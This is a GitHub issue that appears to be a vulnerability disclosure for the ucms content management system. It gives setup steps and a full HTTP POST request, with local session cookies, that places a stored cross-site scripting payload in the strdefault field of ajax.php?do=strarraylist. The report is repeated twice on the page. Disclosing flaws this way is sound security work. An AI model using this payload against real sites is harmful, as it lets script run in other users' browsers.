We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
1.Download address: https://github.com/forget-code/ucms
2.Vulnerability file location: http://127.0.0.1/CVE-Target/ucms-master/ucms/ajax.php? do=strarraylist
3.You need to manually create the cache and uploadfile directories during program installation
4.Ucms-master /ucms/ajax.php installed successfully? do=strarraylist
5.Send a POST request as follows
POST /CVE-Target/ucms-master/ucms/ajax.php?do=strarraylist HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/CVE-Target/ucms-master/ucms/ajax.php?do=strarraylist Content-Type: application/x-www-form-urlencoded Content-Length: 64 Origin: http://127.0.0.1 DNT: 1 Connection: close Cookie: admin_470315=admin; psw_470315=0fb277aadebd45b2ccc4834fe54aac4d; token_470315=b59b44f8 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1
cid=2&strdefault=<script>alert('xss')</script>
over!
The text was updated successfully, but these errors were encountered:
No branches or pull requests
1.Download address: https://github.com/forget-code/ucms
2.Vulnerability file location: http://127.0.0.1/CVE-Target/ucms-master/ucms/ajax.php? do=strarraylist
3.You need to manually create the cache and uploadfile directories during program installation
4.Ucms-master /ucms/ajax.php installed successfully? do=strarraylist
5.Send a POST request as follows
POST /CVE-Target/ucms-master/ucms/ajax.php?do=strarraylist HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/CVE-Target/ucms-master/ucms/ajax.php?do=strarraylist
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://127.0.0.1
DNT: 1
Connection: close
Cookie: admin_470315=admin; psw_470315=0fb277aadebd45b2ccc4834fe54aac4d; token_470315=b59b44f8
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
cid=2&strdefault=<script>alert('xss')</script>
over!
The text was updated successfully, but these errors were encountered: